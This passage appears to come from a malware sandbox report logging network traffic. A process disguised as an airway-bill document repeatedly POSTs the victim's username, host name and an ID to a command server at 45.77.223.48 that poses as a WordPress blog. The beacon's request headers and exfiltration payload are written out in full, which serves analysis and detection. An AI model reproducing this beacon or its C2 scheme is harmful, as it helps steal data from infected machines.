                                              Apr 25, 2024 09:43:14.917490005 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.44981045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:15.173099041 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:15.304244995 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:16.120584965 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:15 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:16.120609045 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:16.120646000 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:16.128948927 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:16.129221916 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:16.129400969 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:16.129493952 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:16.129673004 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:16.129729033 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:16.129795074 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.44981145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:16.392996073 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:16.526114941 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:17.369342089 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:16 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:17.369599104 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:17.369709969 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:17.377700090 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:17.378060102 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:17.378256083 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:17.378369093 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:17.378478050 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:17.378541946 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:17.378712893 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.2.44981245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:17.642261028 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:17.770742893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:18.636362076 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:17 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:18.636396885 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:18.636408091 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:18.657228947 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:18.659353971 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:18.659478903 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:18.659600019 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:18.659692049 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:18.659744024 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:18.659809113 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              63192.168.2.44981345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:18.909478903 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:19.036571980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:19.899868965 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:18 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:19.900007010 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:19.900019884 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:19.908771992 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:19.909132004 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:19.909281969 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:19.909337044 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:19.909456968 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:19.909539938 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:19.909552097 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.2.44981445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:20.366841078 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:20.493375063 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:21.323591948 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:20 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:21.323753119 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:21.323901892 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:21.332727909 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:21.332771063 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
